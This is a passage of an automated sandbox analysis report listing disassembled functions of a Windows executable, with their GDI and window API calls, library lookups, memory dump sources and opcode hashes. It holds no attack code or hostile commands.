                                                                          • Opcode Fuzzy Hash: 3d421fe5b9d66a13501841859f0a8451f50d73c39307a227430f230348f08d3b
                                                                          • Instruction Fuzzy Hash: 65118E30B24204AADB01DB66C802BDF7BB9EF15318F61C0B7F406E7286EB79D9018758
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0041B3D2 Relevance: 10.6, APIs: 7, Instructions: 57windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SelectObject.GDI32(00000000,?), ref: 0041B3E0
                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B3EF
                                                                          • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B41B
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0041B429
                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B437
                                                                          • DeleteDC.GDI32(00000000), ref: 0041B440
                                                                          • DeleteDC.GDI32(?), ref: 0041B449
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ObjectSelect$Delete$Stretch
                                                                          • String ID:
                                                                          • API String ID: 1458357782-0
                                                                          • Opcode ID: 5d8119482a24acdf9dbc4f71c87d898742faec31f652e860e6f74a5bb4e0366a
                                                                          • Instruction ID: 073f11bba2386bee955988a390c3df6f0cbda7ed7a331810ab0cae2060ca734e
                                                                          • Opcode Fuzzy Hash: 5d8119482a24acdf9dbc4f71c87d898742faec31f652e860e6f74a5bb4e0366a
                                                                          • Instruction Fuzzy Hash: F9114C72E40659ABDF10D6D9D985FAFB3BCEF08704F048456B614FB242C678A8418B54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0048F440 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • 73A1A570.USER32(00000000,?,?,00000000), ref: 0048F451
                                                                            • Part of subcall function 0041A158: CreateFontIndirectA.GDI32(?), ref: 0041A217
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0048F473
                                                                          • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,0048F9C9), ref: 0048F487
                                                                          • GetTextMetricsA.GDI32(00000000,?), ref: 0048F4A9
                                                                          • 73A1A480.USER32(00000000,00000000,0048F4D3,0048F4CC,?,00000000,?,?,00000000), ref: 0048F4C6
                                                                          Strings
                                                                          • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 0048F47E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
                                                                          • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                          • API String ID: 1435929781-222967699
                                                                          • Opcode ID: aec2ce94ca0a2fe66ea55faeebd29ac8e829e062f1f7dec7e9667981b672f2ca
                                                                          • Instruction ID: 36afa4b657b34b8522d1c231de5a8c505386f3c2143f3af581d88b388b6b6632
                                                                          • Opcode Fuzzy Hash: aec2ce94ca0a2fe66ea55faeebd29ac8e829e062f1f7dec7e9667981b672f2ca
                                                                          • Instruction Fuzzy Hash: BF016575A04608BFEB01EAA5CC41F6FB7ECDB49704F514477B604E7281D6789D008B68
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00423304 Relevance: 10.6, APIs: 7, Instructions: 56threadwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCursorPos.USER32 ref: 0042331F
                                                                          • WindowFromPoint.USER32(?,?), ref: 0042332C
                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0042333A
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00423341
                                                                          • SendMessageA.USER32(00000000,00000084,?,?), ref: 0042335A
                                                                          • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423371
                                                                          • SetCursor.USER32(00000000), ref: 00423383
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                          • String ID:
                                                                          • API String ID: 1770779139-0
                                                                          • Opcode ID: 60706cbef7e7fd969e6117079794ea181f59045882c2055e97c618c29bc945ad
                                                                          • Instruction ID: 4e500bdd1cb7c406dcecfc45487f359b17b305850d12e3c552a5b3a09f906ed3
                                                                          • Opcode Fuzzy Hash: 60706cbef7e7fd969e6117079794ea181f59045882c2055e97c618c29bc945ad
                                                                          • Instruction Fuzzy Hash: EC01D4223043103AD620BB795C86E3F26A8CFC5B55F50417FB909BE283DA3D8D0163AD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0048F264 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(user32.dll), ref: 0048F274
                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 0048F281
                                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0048F28E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleModule
                                                                          • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                          • API String ID: 667068680-2254406584
                                                                          • Opcode ID: 1e6e599f15a85ca3434ac6dc2256e25d95c130a7a50b60adec5cf6b1919fb023
                                                                          • Instruction ID: 320adb3965b6f495dc5cbca51cbfa6a5691965cf1facb545b0a128d01ebcbff3
                                                                          • Opcode Fuzzy Hash: 1e6e599f15a85ca3434ac6dc2256e25d95c130a7a50b60adec5cf6b1919fb023
                                                                          • Instruction Fuzzy Hash: FBF0CDAAB41B1566D62072B60C82B7F618CCB81770F1408B7BD04A62C2EDAA8D0943BD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00455EB0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00455EE0
                                                                          • GetExitCodeProcess.KERNEL32(?,^%I), ref: 00455F01
                                                                          • CloseHandle.KERNEL32(?,00455F34,?,?,OgE,00000000,00000000), ref: 00455F27
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                          • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects$^%I
                                                                          • API String ID: 2573145106-2465217090
                                                                          • Opcode ID: eae7e9bc5b852605da3e4c9cab9726f535817d301444d626726a3ca8f125a080
                                                                          • Instruction ID: 06bcc0b7b5ae778b55f830a6e63720fcc7028796f4e4f28f42062f96750590e8
                                                                          • Opcode Fuzzy Hash: eae7e9bc5b852605da3e4c9cab9726f535817d301444d626726a3ca8f125a080
                                                                          • Instruction Fuzzy Hash: 3401A271600604AFDB10EB99CC22E2E73A8EB49715F504177F810DB7D3DA3C9D04DA18
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0045B9AC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045B9B5
                                                                          • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045B9C5
                                                                          • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045B9D5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc
                                                                          • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                          • API String ID: 190572456-212574377
                                                                          • Opcode ID: 622227cba5b86ca8fccab1400ad34dc8923e22f3f5578f85d6d1e5fdf3acff14
                                                                          • Instruction ID: bb37bbad0c8d10f251c0aa8c4ec345e64f50a4bb6c8e2d07f97ee2e6ad287d5c
                                                                          • Opcode Fuzzy Hash: 622227cba5b86ca8fccab1400ad34dc8923e22f3f5578f85d6d1e5fdf3acff14
                                                                          • Instruction Fuzzy Hash: A0F012B1600745DEEB14DF77EC41B2626A9E7E8326F14803BD8065936AE37C080ADE5C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0044C070 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(oleacc.dll,?,0044E91D), ref: 0044C07F
                                                                          • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C090
                                                                          • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C0A0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$LibraryLoad
                                                                          • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                          • API String ID: 2238633743-1050967733
                                                                          • Opcode ID: b2562950c71cd23530e2a56bc8551780a47537d70dbbb9d9fb25e2bb869be04b
                                                                          • Instruction ID: ac0d725b3ee157e0591d3c5333f5e4ccdb9c4df60658dd2baa23885d1ab8f8cf
                                                                          • Opcode Fuzzy Hash: b2562950c71cd23530e2a56bc8551780a47537d70dbbb9d9fb25e2bb869be04b
                                                                          • Instruction Fuzzy Hash: 82F01270142389CBFBA0EBF5EDC9F123294D3A170DF18517BA0019A2E2C7BD4445CA0D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0042E754 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 20libraryloaderwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0048FAFA,QueryCancelAutoPlay,004929A3), ref: 0042E76A
                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E770
                                                                          • InterlockedExchange.KERNEL32(00494660,00000001), ref: 0042E781
                                                                          • ChangeWindowMessageFilter.USER32(0000C1C2,00000001), ref: 0042E792
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressChangeExchangeFilterHandleInterlockedMessageModuleProcWindow
                                                                          • String ID: ChangeWindowMessageFilter$user32.dll
                                                                          • API String ID: 1365377179-2498399450
                                                                          • Opcode ID: 34d0edbb10ef2500e3b808e5a736a7631458895e216e2905709a8920c88350df
                                                                          • Instruction ID: 4a434d6ebf99a211ad985c76b6619d27f745a5091495b81aefed992397c45a81
                                                                          • Opcode Fuzzy Hash: 34d0edbb10ef2500e3b808e5a736a7631458895e216e2905709a8920c88350df
                                                                          • Instruction Fuzzy Hash: 7BE0ECE1741310EAEAA0BBA2FC8AF5A399497E5719F50003BF104651E2C6BD0C41C91C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00473B70 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 14libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,00492999), ref: 00473B76
                                                                          • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00473B83
                                                                          • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00473B93
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleModule
                                                                          • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                          • API String ID: 667068680-222143506
                                                                          • Opcode ID: 315d5260c9f678ade1a0cc40628bf4d981144f5db400e838a2cc1962c1f8332f
                                                                          • Instruction ID: dcc6af067bf3078790d87b20fbc0612a0ccff274e7f94df7ba8b603e8e0053f1
                                                                          • Opcode Fuzzy Hash: 315d5260c9f678ade1a0cc40628bf4d981144f5db400e838a2cc1962c1f8332f
                                                                          • Instruction Fuzzy Hash: 89C012F0241700EDDA10AFF15CC2D7A2148E540B2A720817BF448791C7D67C6E055A1D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0041B5DC Relevance: 9.1, APIs: 6, Instructions: 144windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFocus.USER32 ref: 0041B6B5
                                                                          • 73A1A570.USER32(?), ref: 0041B6C1
                                                                          • 73A18830.GDI32(00000000,?,00000000,00000000,0041B78C,?,?), ref: 0041B6F6
                                                                          • 73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041B78C,?,?), ref: 0041B702
                                                                          • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B76A,?,00000000,0041B78C,?,?), ref: 0041B730
                                                                          • 73A18830.GDI32(00000000,00000000,00000000,0041B771,?,?,00000000,00000000,0041B76A,?,00000000,0041B78C,?,?), ref: 0041B764
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: A18830$A122A26310A570Focus
                                                                          • String ID:
                                                                          • API String ID: 3906783838-0
                                                                          • Opcode ID: 8ecdb598e1a4996df05dfcc0867a12236d6d7e85a0aef6664a328bbccf7dd41e
                                                                          • Instruction ID: 06dd750ffd38faa4806619bbf82afcbb6c92213719a6bc319da55d16d67b79f4
                                                                          • Opcode Fuzzy Hash: 8ecdb598e1a4996df05dfcc0867a12236d6d7e85a0aef6664a328bbccf7dd41e
                                                                          • Instruction Fuzzy Hash: 8E512C70A00609AFDF11DFA9C895AEEBBB8FF49704F104466F510A7390D7789981CBA9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0041B8AC Relevance: 9.1, APIs: 6, Instructions: 142windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFocus.USER32 ref: 0041B987
                                                                          • 73A1A570.USER32(?), ref: 0041B993
                                                                          • 73A18830.GDI32(00000000,?,00000000,00000000,0041BA59,?,?), ref: 0041B9CD
                                                                          • 73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041BA59,?,?), ref: 0041B9D9
                                                                          • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BA37,?,00000000,0041BA59,?,?), ref: 0041B9FD
                                                                          • 73A18830.GDI32(00000000,00000000,00000000,0041BA3E,?,?,00000000,00000000,0041BA37,?,00000000,0041BA59,?,?), ref: 0041BA31
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: A18830$A122A26310A570Focus
                                                                          • String ID:
                                                                          • API String ID: 3906783838-0
                                                                          • Opcode ID: d652c417c9a8b03d43389ce1c345903e188ace57285e6eb171d305152e46db0d
                                                                          • Instruction ID: 49b1e422d63778e1935042bf56866254f806bc58ba08b8974fd4ee1451f7b7cb
                                                                          • Opcode Fuzzy Hash: d652c417c9a8b03d43389ce1c345903e188ace57285e6eb171d305152e46db0d
                                                                          • Instruction Fuzzy Hash: 4F512B74A006089FCB11DFA9C895AAEBBF9FF48700F118066F904EB750D7389D40CBA8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0041B478 Relevance: 9.1, APIs: 6, Instructions: 113windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFocus.USER32 ref: 0041B4EE
                                                                          • 73A1A570.USER32(?,00000000,0041B5C8,?,?,?,?), ref: 0041B4FA
                                                                          • 73A24620.GDI32(?,00000068,00000000,0041B59C,?,?,00000000,0041B5C8,?,?,?,?), ref: 0041B516
                                                                          • 73A4E680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B59C,?,?,00000000,0041B5C8,?,?,?,?), ref: 0041B533
                                                                          • 73A4E680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B59C,?,?,00000000,0041B5C8), ref: 0041B54A
                                                                          • 73A1A480.USER32(?,?,0041B5A3,?,?), ref: 0041B596
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: E680$A24620A480A570Focus
                                                                          • String ID:
                                                                          • API String ID: 3709697839-0
                                                                          • Opcode ID: 4a4a7d32ada1a740a668c755e1a66010c357d4bec648edb4ace877a09f191135
                                                                          • Instruction ID: a6e4b16520c9e4bc630ca31e265eea6a5194191570467489af8bdb357d288b52
                                                                          • Opcode Fuzzy Hash: 4a4a7d32ada1a740a668c755e1a66010c357d4bec648edb4ace877a09f191135
                                                                          • Instruction Fuzzy Hash: 2D41C571A04254AFDF10DFA9C885AAFBBB5EF49704F1484AAE900E7351D2389D10CBA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0045B370 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 73COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetLastError.KERNEL32(00000057,00000000,0045B43C,?,?,?,?,00000000), ref: 0045B3DB
                                                                          • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045B4A8,?,00000000,0045B43C,?,?,?,?,00000000), ref: 0045B41A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                          • API String ID: 1452528299-1580325520
                                                                          • Opcode ID: 396c5408a265f2c87cad4762a3c8b1d35ea086b60968f103d8f30e223deffe3c
                                                                          • Instruction ID: 700096bd68f309f90710c381aa7dde6ba0fdda2f7fc45a32d8085176b984ac24
                                                                          • Opcode Fuzzy Hash: 396c5408a265f2c87cad4762a3c8b1d35ea086b60968f103d8f30e223deffe3c
                                                                          • Instruction Fuzzy Hash: F911BB35204204AFD721DAA5C981B6E779DDB49306F708077BD0166383D77C9F0A95AE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0041BCFC Relevance: 9.1, APIs: 6, Instructions: 71COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSystemMetrics.USER32(0000000B), ref: 0041BD45
                                                                          • GetSystemMetrics.USER32(0000000C), ref: 0041BD4F
                                                                          • 73A1A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BD59
                                                                          • 73A24620.GDI32(00000000,0000000E,00000000,0041BDCC,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BD80
                                                                          • 73A24620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BDCC,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BD8D
                                                                          • 73A1A480.USER32(00000000,00000000,0041BDD3,0000000E,00000000,0041BDCC,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDC6
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: A24620MetricsSystem$A480A570
                                                                          • String ID:
                                                                          • API String ID: 4042297458-0
                                                                          • Opcode ID: 1c903c0536bb10720712021bcda66a401c12054db1b22576e6386974878fa910
                                                                          • Instruction ID: 8181195c8b7ace5e518c23098daf85fccaa127339f370ed271397b7e8efdaee2
                                                                          • Opcode Fuzzy Hash: 1c903c0536bb10720712021bcda66a401c12054db1b22576e6386974878fa910
                                                                          • Instruction Fuzzy Hash: 1F212C74E046499FEB04EFA9C941BEEB7B4EB48714F10402AF514B7680D7785940CFA9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00478D58 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 00478D66
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,004687F2), ref: 00478D8C
                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 00478D9C
                                                                          • SetWindowLongA.USER32(?,000000EC,00000000), ref: 00478DBD
                                                                          • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 00478DD1
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 00478DED
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Long$Show
                                                                          • String ID:
                                                                          • API String ID: 3609083571-0
                                                                          • Opcode ID: b84e9f19ff0ee670dcbfc2807fcaec7768f162b85f5824c815ec19dbe8d39123
                                                                          • Instruction ID: 849554ad505ceeff35d37c7ff58508bf2e1726df1cd7e8e141310fbeec4833cd
                                                                          • Opcode Fuzzy Hash: b84e9f19ff0ee670dcbfc2807fcaec7768f162b85f5824c815ec19dbe8d39123
                                                                          • Instruction Fuzzy Hash: 20014CB1681210ABD610D768CD85F663798AB5E331F06436AB558DB3E3CA3DDC009B08
                                                                          Uniqueness

